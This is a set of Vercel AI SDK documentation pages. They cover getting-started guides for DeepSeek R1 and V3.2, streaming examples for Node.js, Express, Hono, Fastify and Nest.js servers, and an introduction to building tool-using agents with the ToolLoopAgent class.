The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like DeepSeek R1 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
DeepSeek R1
DeepSeek R1 is a series of advanced AI models designed to tackle complex reasoning tasks in science, coding, and mathematics. These models are optimized to "think before they answer," producing detailed internal chains of thought that aid in solving challenging problems.
The series includes two primary variants:
- DeepSeek R1-Zero: Trained exclusively with reinforcement learning (RL) without any supervised fine-tuning. It exhibits advanced reasoning capabilities but may struggle with readability and formatting.
- DeepSeek R1: Combines reinforcement learning with cold-start data and supervised fine-tuning to improve both reasoning performance and the readability of outputs.
Benchmarks
DeepSeek R1 models excel in reasoning tasks, delivering competitive performance across key benchmarks:
- AIME 2024 (Pass@1): 79.8%
- MATH-500 (Pass@1): 97.3%
- Codeforces (Percentile): Top 4% (96.3%)
- GPQA Diamond (Pass@1): 71.5%
Prompt Engineering for DeepSeek R1 Models
DeepSeek R1 models excel with structured and straightforward prompts. The following best practices can help achieve optimal performance:
- Use a structured format: Leverage the model's preferred output structure with <think> tags for reasoning and <answer> tags for the final result (see the sketch after this list).
- Prefer zero-shot prompts: Avoid few-shot prompting, as it can degrade performance; instead, state the problem directly and clearly.
- Specify output expectations: Guide the model by defining desired formats, such as markdown for readability or XML-like tags for clarity.
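As an illustrative sketch of these practices (the prompt wording is ours, not from the DeepSeek documentation; the provider setup is covered in the next section):
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
// Zero-shot: state the problem directly and specify the expected structure.
const { text } = await generateText({
model: deepseek('deepseek-reasoner'),
prompt:
'What is the sum of the first 100 positive integers? ' +
'Reason step by step inside <think> tags, then give only the final number inside <answer> tags.',
});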
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call DeepSeek R1 with the AI SDK:
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const { reasoningText, text } = await generateText({
model: deepseek('deepseek-reasoner'),
prompt: 'Explain quantum entanglement.',
});
The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use DeepSeek R1 via Fireworks:
import { fireworks } from '@ai-sdk/fireworks';
import {
generateText,
wrapLanguageModel,
extractReasoningMiddleware,
} from 'ai';
// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
model: fireworks('accounts/fireworks/models/deepseek-r1'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
const { reasoningText, text } = await generateText({
model: enhancedModel,
prompt: 'Explain quantum entanglement.',
});
Or to use Groq's deepseek-r1-distill-llama-70b model:
import { groq } from '@ai-sdk/groq';
import {
generateText,
wrapLanguageModel,
extractReasoningMiddleware,
} from 'ai';
// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
model: groq('deepseek-r1-distill-llama-70b'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
const { reasoningText, text } = await generateText({
model: enhancedModel,
prompt: 'Explain quantum entanglement.',
});
When using DeepSeek-R1 series models with third-party providers like Together AI, we recommend enabling the startWithReasoning option of the extractReasoningMiddleware function, as these providers tend to return responses that begin directly with reasoning, omitting the opening <think> tag.
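A minimal sketch of that configuration, assuming the Together AI provider and the model ID from the comparison table below:
import { togetherai } from '@ai-sdk/togetherai';
import {
generateText,
wrapLanguageModel,
extractReasoningMiddleware,
} from 'ai';
// startWithReasoning treats the response as already inside the reasoning
// block, for providers that omit the opening <think> tag.
const enhancedModel = wrapLanguageModel({
model: togetherai('deepseek-ai/DeepSeek-R1'),
middleware: extractReasoningMiddleware({
tagName: 'think',
startWithReasoning: true,
}),
});
const { reasoningText, text } = await generateText({
model: enhancedModel,
prompt: 'Explain quantum entanglement.',
});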
Model Provider Comparison
You can use DeepSeek R1 with the AI SDK through various providers. Here's a comparison of the providers that support DeepSeek R1:
| Provider | Model ID | Reasoning Tokens |
|---|---|---|
| DeepSeek | deepseek-reasoner | Supported |
| Fireworks | accounts/fireworks/models/deepseek-r1 | Requires Middleware |
| Groq | deepseek-r1-distill-llama-70b | Requires Middleware |
| Azure | DeepSeek-R1 | Requires Middleware |
| Together AI | deepseek-ai/DeepSeek-R1 | Requires Middleware |
| FriendliAI | deepseek-r1 | Requires Middleware |
| LangDB | deepseek/deepseek-reasoner | Requires Middleware |
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and DeepSeek R1:
In a new Next.js application, first install the AI SDK and the DeepSeek provider:
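For example, with pnpm (a typical command; the packages match the imports used in this guide):
pnpm add ai @ai-sdk/deepseek @ai-sdk/react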
Then, create a route handler for the chat endpoint:
import { deepseek } from '@ai-sdk/deepseek';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: deepseek('deepseek-reasoner'),
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
sendReasoning: true,
});
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'reasoning') {
return <pre key={index}>{part.text}</pre>;
}
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
return null;
})}
</div>
))}
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Limitations
While DeepSeek R1 models are powerful, they have certain limitations:
- No tool-calling support: DeepSeek R1 cannot directly interact with APIs or external tools.
- No object generation support: DeepSeek R1 does not support structured object generation. However, you can combine it with models that support structured object generation (like gpt-4o-mini) to generate objects. See the structured object generation with a reasoning model recipe for more information; a sketch of this pattern follows below.
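A minimal sketch of that two-model pattern (model choices and prompt are illustrative):
import { deepseek } from '@ai-sdk/deepseek';
import { openai } from '@ai-sdk/openai';
import { generateText, Output } from 'ai';
import { z } from 'zod';
// Step 1: let the reasoning model produce a free-form analysis.
const { text: analysis } = await generateText({
model: deepseek('deepseek-reasoner'),
prompt: 'Compare REST and GraphQL for a mobile application backend.',
});
// Step 2: use a model with structured output support to extract typed data.
const { output } = await generateText({
model: openai('gpt-4o-mini'),
output: Output.object({
schema: z.object({
pros: z.array(z.string()),
cons: z.array(z.string()),
recommendation: z.string(),
}),
}),
prompt: `Extract the key points from this analysis:\n\n${analysis}`,
});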
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
DeepSeek R1 opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.
title: Get started with DeepSeek V3.2 description: Get started with DeepSeek V3.2 using the AI SDK. tags: ['getting-started', 'agents']
Get started with DeepSeek V3.2
With the release of DeepSeek V3.2, there has never been a better time to start building AI applications that require advanced reasoning and agentic capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like DeepSeek V3.2 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
DeepSeek V3.2
DeepSeek V3.2 is a frontier model that harmonizes high computational efficiency with superior reasoning and agent performance. It introduces several key technical breakthroughs that enable it to perform comparably to GPT-5 while remaining open-source.
The series includes two primary variants:
- DeepSeek V3.2: The official successor to V3.2-Exp. A balanced model optimized for both reasoning and inference efficiency, delivering GPT-5 level performance.
- DeepSeek V3.2-Speciale: A high-compute variant with maxed-out reasoning capabilities that rivals Gemini-3.0-Pro. Achieves gold-medal performance in IMO 2025, CMO 2025, ICPC World Finals 2025, and IOI 2025. As of release, it does not support tool-use.
Benchmarks
DeepSeek V3.2 models excel in both reasoning and agentic tasks, delivering competitive performance across key benchmarks:
Reasoning Capabilities
- AIME 2025 (Pass@1): 96.0% (Speciale)
- HMMT 2025 (Pass@1): 99.2% (Speciale)
- HLE (Pass@1): 30.6%
- Codeforces (Rating): 2701 (Speciale)
Agentic Capabilities
- SWE Verified (Resolved): 73.1%
- Terminal Bench 2.0 (Acc): 46.4%
- τ2 Bench (Pass@1): 80.3%
- Tool Decathlon (Pass@1): 35.2%
Model Options
When using DeepSeek V3.2 with the AI SDK, you have two model options:
| Model Alias | Model Version | Description |
|---|---|---|
| deepseek-chat | DeepSeek-V3.2 (Non-thinking Mode) | Standard chat model |
| deepseek-reasoner | DeepSeek-V3.2 (Thinking Mode) | Enhanced reasoning for complex problem-solving |
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building agents, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call DeepSeek V3.2 with the AI SDK:
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const { text } = await generateText({
model: deepseek('deepseek-chat'),
prompt: 'Explain the concept of sparse attention in transformers.',
});
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building an agent with Next.js, the AI SDK, and DeepSeek V3.2:
In a new Next.js application, first install the AI SDK and the DeepSeek provider:
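For example, with pnpm (a typical command; the packages match the imports used in this guide):
pnpm add ai @ai-sdk/deepseek @ai-sdk/react zod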
Then, create a route handler for the chat endpoint:
import { deepseek } from '@ai-sdk/deepseek';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: deepseek('deepseek-reasoner'),
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({ sendReasoning: true });
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'text' || part.type === 'reasoning') {
return <div key={index}>{part.text}</div>;
}
return null;
})}
</div>
))}
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Enhance Your Agent with Tools
One of the key strengths of DeepSeek V3.2 is its agentic capabilities. You can extend your agent's functionality by adding tools that allow the model to perform specific actions or retrieve information.
Update Your Route Handler
Let's add a weather tool to your agent. Update your route handler at app/api/chat/route.ts:
import { deepseek } from '@ai-sdk/deepseek';
import {
convertToModelMessages,
stepCountIs,
streamText,
tool,
UIMessage,
} from 'ai';
import { z } from 'zod';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: deepseek('deepseek-reasoner'),
messages: await convertToModelMessages(messages),
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72,
unit: 'fahrenheit',
}),
}),
},
stopWhen: stepCountIs(5),
});
return result.toUIMessageStreamResponse({ sendReasoning: true });
}
This adds a weather tool that the model can call when needed. The stopWhen: stepCountIs(5) parameter allows the agent to continue executing for multiple steps (up to 5), enabling it to use tools and reason iteratively before stopping. Learn more about loop control to customize when and how your agent stops execution.
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Guides description: Learn how to build AI applications with the AI SDK
Guides
These use-case specific guides are intended to help you build real applications with the AI SDK.
<IndexCards cards={[ { title: 'RAG Agent', description: 'Learn how to build a RAG Agent with the AI SDK and Next.js.', href: '/cookbook/guides/rag-chatbot', }, { title: 'Multi-Modal Agent', description: 'Learn how to build a multi-modal agent that can process images and PDFs with the AI SDK.', href: '/cookbook/guides/multi-modal-chatbot', }, { title: 'Slackbot Agent', description: 'Learn how to use the AI SDK to build an AI Agent in Slack.', href: '/cookbook/guides/slackbot', }, { title: 'Natural Language Postgres (SQL Agent)', description: 'Learn how to build a Next.js app that lets you talk to a PostgreSQL database in natural language.', href: '/cookbook/guides/natural-language-postgres', }, { title: 'Get started with Computer Use', description: "Get started with Claude's Computer Use capabilities with the AI SDK.", href: '/cookbook/guides/computer-use', }, { title: 'Add Skills to Your Agent', description: 'Extend your agent with specialized capabilities loaded at runtime from markdown files.', href: '/cookbook/guides/agent-skills', }, { title: 'Get started with Gemini 2.5', description: 'Get started with Gemini 2.5 using the AI SDK.', href: '/cookbook/guides/gemini-2-5', }, { title: 'Get started with Claude 4', description: 'Get started with Claude 4 using the AI SDK.', href: '/cookbook/guides/claude-4', }, { title: 'OpenAI Responses API', description: 'Get started with the OpenAI Responses API using the AI SDK.', href: '/cookbook/guides/openai-responses', }, { title: 'Get started with Claude 3.7 Sonnet', description: 'Get started with Claude 3.7 Sonnet using the AI SDK.', href: '/cookbook/guides/sonnet-3-7', }, { title: 'Get started with Llama 3.1', description: 'Get started with Llama 3.1 using the AI SDK.', href: '/cookbook/guides/llama-3_1', }, { title: 'Get started with GPT-5', description: 'Get started with GPT-5 using the AI SDK.', href: '/cookbook/guides/gpt-5', }, { title: 'Get started with OpenAI o1', description: 'Get started with OpenAI o1 using the AI SDK.', href: '/cookbook/guides/o1', }, { title: 'Get started with OpenAI o3-mini', description: 'Get started with OpenAI o3-mini using the AI SDK.', href: '/cookbook/guides/o3', }, { title: 'Get started with DeepSeek R1', description: 'Get started with DeepSeek R1 using the AI SDK.', href: '/cookbook/guides/r1', }, ]} />
title: Node.js HTTP Server description: Learn how to use the AI SDK in a Node.js HTTP server tags: ['api servers', 'streaming']
Node.js HTTP Server
You can use the AI SDK in a Node.js HTTP server to generate text and stream it to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it using curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/node-http-server
UI Message Stream
You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.
import { streamText } from 'ai';
import { createServer } from 'http';
createServer(async (req, res) => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeUIMessageStreamToResponse(res);
}).listen(8080);
Sending Custom Data
createUIMessageStream and pipeUIMessageStreamToResponse can be used to send custom data to the client.
import {
createUIMessageStream,
pipeUIMessageStreamToResponse,
streamText,
} from 'ai';
import { createServer } from 'http';
createServer(async (req, res) => {
switch (req.url) {
case '/stream-data': {
const stream = createUIMessageStream({
execute: ({ writer }) => {
// write some custom data
writer.write({ type: 'start' });
writer.write({
type: 'data-custom',
data: {
custom: 'Hello, world!',
},
});
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
writer.merge(
result.toUIMessageStream({
sendStart: false,
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
}),
);
},
});
pipeUIMessageStreamToResponse({ stream, response: res });
break;
}
}
}).listen(8080);
Text Stream
You can send a text stream to the client using pipeTextStreamToResponse.
import { streamText } from 'ai';
import { createServer } from 'http';
createServer(async (req, res) => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeTextStreamToResponse(res);
}).listen(8080);
Troubleshooting
- Streaming not working when proxied
title: Express description: Learn how to use the AI SDK in an Express server tags: ['api servers', 'streaming']
Express
You can use the AI SDK in an Express server to generate and stream text and objects to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it using curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/express
UI Message Stream
You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.
import { streamText } from 'ai';
import express, { Request, Response } from 'express';
const app = express();
app.post('/', async (req: Request, res: Response) => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeUIMessageStreamToResponse(res);
});
app.listen(8080, () => {
console.log(`Example app listening on port ${8080}`);
});
Sending Custom Data
pipeUIMessageStreamToResponse can be used to send custom data to the client.
import {
createUIMessageStream,
pipeUIMessageStreamToResponse,
streamText,
} from 'ai';
import express, { Request, Response } from 'express';
const app = express();
app.post('/custom-data-parts', async (req: Request, res: Response) => {
pipeUIMessageStreamToResponse({
response: res,
stream: createUIMessageStream({
execute: async ({ writer }) => {
writer.write({ type: 'start' });
writer.write({
type: 'data-custom',
data: {
custom: 'Hello, world!',
},
});
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
writer.merge(result.toUIMessageStream({ sendStart: false }));
},
}),
});
});
app.listen(8080, () => {
console.log(`Example app listening on port ${8080}`);
});
Text Stream
You can send a text stream to the client using pipeTextStreamToResponse.
import { streamText } from 'ai';
import express, { Request, Response } from 'express';
const app = express();
app.post('/', async (req: Request, res: Response) => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeTextStreamToResponse(res);
});
app.listen(8080, () => {
console.log(`Example app listening on port ${8080}`);
});
Troubleshooting
- Streaming not working when proxied
title: Hono description: Example of using the AI SDK in a Hono server. tags: ['api servers', 'streaming']
Hono
You can use the AI SDK in a Hono server to generate and stream text and objects to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it using curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/hono
UI Message Stream
You can use the toUIMessageStreamResponse method to create a properly formatted streaming response.
import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';
const app = new Hono();
app.post('/', async c => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
return result.toUIMessageStreamResponse();
});
serve({ fetch: app.fetch, port: 8080 });
Text Stream
You can use the toTextStreamResponse method to return a text stream response.
import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';
const app = new Hono();
app.post('/text', async c => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Write a short poem about coding.',
});
return result.toTextStreamResponse();
});
serve({ fetch: app.fetch, port: 8080 });
Sending Custom Data
You can use createUIMessageStream and createUIMessageStreamResponse to send custom data to the client.
import { serve } from '@hono/node-server';
import {
createUIMessageStream,
createUIMessageStreamResponse,
streamText,
} from 'ai';
import { Hono } from 'hono';
const app = new Hono();
app.post('/stream-data', async c => {
// immediately start streaming the response
const stream = createUIMessageStream({
execute: ({ writer }) => {
writer.write({ type: 'start' });
writer.write({
type: 'data-custom',
data: {
custom: 'Hello, world!',
},
});
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
writer.merge(
result.toUIMessageStream({
sendStart: false,
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
}),
);
},
});
return createUIMessageStreamResponse({ stream });
});
serve({ fetch: app.fetch, port: 8080 });
Troubleshooting
- Streaming not working when proxied
title: Fastify description: Learn how to use the AI SDK in a Fastify server tags: ['api servers', 'streaming']
Fastify
You can use the AI SDK in a Fastify server to generate and stream text and objects to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it using curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/fastify
UI Message Stream
You can use the toUIMessageStream method to get a UI message stream from the result and then pipe it to the response.
import { streamText } from 'ai';
import Fastify from 'fastify';
const fastify = Fastify({ logger: true });
fastify.post('/', async function (request, reply) {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
reply.header('Content-Type', 'text/plain; charset=utf-8');
return reply.send(result.toUIMessageStream());
});
fastify.listen({ port: 8080 });
Sending Custom Data
createUIMessageStream can be used to send custom data to the client.
import { createUIMessageStream, streamText } from 'ai';
import Fastify from 'fastify';
const fastify = Fastify({ logger: true });
fastify.post('/stream-data', async function (request, reply) {
// immediately start streaming the response
const stream = createUIMessageStream({
execute: async ({ writer }) => {
writer.write({ type: 'start' });
writer.write({
type: 'data-custom',
data: {
custom: 'initialized call',
},
});
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
writer.merge(result.toUIMessageStream({ sendStart: false }));
},
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
});
reply.header('Content-Type', 'text/plain; charset=utf-8');
return reply.send(stream);
});
fastify.listen({ port: 8080 });
Text Stream
You can use the textStream property to get a text stream from the result and then pipe it to the response.
import { streamText } from 'ai';
import Fastify from 'fastify';
const fastify = Fastify({ logger: true });
fastify.post('/', async function (request, reply) {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
reply.header('Content-Type', 'text/plain; charset=utf-8');
return reply.send(result.textStream);
});
fastify.listen({ port: 8080 });
Troubleshooting
- Streaming not working when proxied
title: Nest.js description: Learn how to use the AI SDK in a Nest.js server tags: ['api servers', 'streaming']
Nest.js
You can use the AI SDK in a Nest.js server to generate and stream text and objects to the client.
Examples
The examples show how to implement a Nest.js controller that uses the AI SDK to stream text and objects to the client.
Full example: github.com/vercel/ai/examples/nest
UI Message Stream
You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.
import { Controller, Post, Res } from '@nestjs/common';
import { streamText } from 'ai';
import { Response } from 'express';
@Controller()
export class AppController {
@Post('/')
async root(@Res() res: Response) {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeUIMessageStreamToResponse(res);
}
}
Sending Custom Data
createUIMessageStream and pipeUIMessageStreamToResponse can be used to send custom data to the client.
import { Controller, Post, Res } from '@nestjs/common';
import {
createUIMessageStream,
streamText,
pipeUIMessageStreamToResponse,
} from 'ai';
import { Response } from 'express';
@Controller()
export class AppController {
@Post('/stream-data')
async streamData(@Res() response: Response) {
const stream = createUIMessageStream({
execute: ({ writer }) => {
// write some data
writer.write({ type: 'start' });
writer.write({
type: 'data-custom',
data: {
custom: 'Hello, world!',
},
});
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
writer.merge(
result.toUIMessageStream({
sendStart: false,
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
}),
);
},
});
pipeUIMessageStreamToResponse({ stream, response });
}
}
Text Stream
You can use the pipeTextStreamToResponse method to get a text stream from the result and then pipe it to the response.
import { Controller, Post, Res } from '@nestjs/common';
import { streamText } from 'ai';
import { Response } from 'express';
@Controller()
export class AppController {
@Post()
async example(@Res() res: Response) {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeTextStreamToResponse(res);
}
}
Troubleshooting
- Streaming not working when proxied
title: AI SDK by Vercel description: The AI SDK is the TypeScript toolkit for building AI applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.
AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.
Why use the AI SDK?
Integrating large language models (LLMs) into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK standardizes integrating artificial intelligence (AI) models across supported providers. This enables developers to focus on building great AI applications rather than wasting time on provider-specific details.
For example, here’s how you can generate text with various models using the AI SDK:
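For instance, a minimal sketch using the gateway-style model strings that appear in the server examples later in this document; switching providers is a one-line change to the model identifier:
import { generateText } from 'ai';
const { text } = await generateText({
// Swapping providers only changes this identifier string.
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
console.log(text);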
The AI SDK has two main libraries:
- AI SDK Core: A unified API for generating text, structured objects, tool calls, and building agents with LLMs.
- AI SDK UI: A set of framework-agnostic hooks for quickly building chat and generative user interfaces.
Model Providers
The AI SDK supports multiple model providers.
Templates
We've built some templates that include AI SDK integrations for different use cases, providers, and frameworks. You can use these templates to get started with your AI-powered application.
Starter Kits
Feature Exploration
Frameworks
Generative UI
Security
Join our Community
If you have questions about anything related to the AI SDK, you're always welcome to ask in the Vercel Community.
llms.txt (for Cursor, Windsurf, Copilot, Claude etc.)
You can access the entire AI SDK documentation in Markdown format at ai-sdk.dev/llms.txt. This can be used to ask any LLM (assuming it has a big enough context window) questions about the AI SDK based on the most up-to-date documentation.
Example Usage
For instance, to prompt an LLM with questions about the AI SDK:
- Copy the documentation contents from ai-sdk.dev/llms.txt
- Use the following prompt format:
Documentation:
{paste documentation here}
---
Based on the above documentation, answer the following:
{your question}
title: Overview description: Learn how to build agents with the AI SDK.
Agents
Agents are large language models (LLMs) that use tools in a loop to accomplish tasks.
Three components work together:
- LLMs process input and decide the next action
- Tools extend capabilities beyond text generation (reading files, calling APIs, writing to databases)
- Loop orchestrates execution through:
- Context management - Maintaining conversation history and deciding what the model sees (input) at each step
- Stopping conditions - Determining when the loop (task) is complete
ToolLoopAgent Class
The ToolLoopAgent class handles these three components. Here's an agent that uses multiple tools in a loop to accomplish a task:
import { ToolLoopAgent, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const weatherAgent = new ToolLoopAgent({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location (in Fahrenheit)',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
convertFahrenheitToCelsius: tool({
description: 'Convert temperature from Fahrenheit to Celsius',
inputSchema: z.object({
temperature: z.number().describe('Temperature in Fahrenheit'),
}),
execute: async ({ temperature }) => {
const celsius = Math.round((temperature - 32) * (5 / 9));
return { celsius };
},
}),
},
});
const result = await weatherAgent.generate({
prompt: 'What is the weather in San Francisco in celsius?',
});
console.log(result.text); // agent's final answer
console.log(result.steps); // steps taken by the agent
The agent automatically:
- Calls the weather tool to get the temperature in Fahrenheit
- Calls convertFahrenheitToCelsius to convert it
- Generates a final text response with the result
The ToolLoopAgent handles the loop, context management, and stopping conditions.
Why Use the ToolLoopAgent?
The ToolLoopAgent is the recommended approach for building agents with the AI SDK because it:
- Reduces boilerplate - Manages loops and message arrays
- Improves reusability - Define once, use throughout your application
- Simplifies maintenance - Single place to update agent configuration
For most use cases, start with the ToolLoopAgent. Use core functions (generateText, streamText) when you need explicit control over each step for complex structured workflows.
Structured Workflows
Agents are flexible and powerful, but non-deterministic. When you need reliable, repeatable outcomes with explicit control flow, use core functions with structured workflow patterns combining:
- Conditional statements for explicit branching
- Standard functions for reusable logic
- Error handling for robustness
- Explicit control flow for predictability
Explore workflow patterns to learn more about building structured, reliable systems.
Next Steps
- Building Agents - Guide to creating agents with the ToolLoopAgent
- Workflow Patterns - Structured patterns using core functions for complex workflows
- Loop Control - Execution control with stopWhen and prepareStep
title: Building Agents description: Complete guide to creating agents with the ToolLoopAgent.
Building Agents
The ToolLoopAgent provides a structured way to encapsulate LLM configuration, tools, and behavior into reusable components. It handles the agent loop for you, allowing the LLM to call tools multiple times in sequence to accomplish complex tasks. Define agents once and use them across your application.
Why Use the ToolLoopAgent Class?
When building AI applications, you often need to:
- Reuse configurations - Same model settings, tools, and prompts across different parts of your application
- Maintain consistency - Ensure the same behavior and capabilities throughout your codebase
- Simplify API routes - Reduce boilerplate in your endpoints
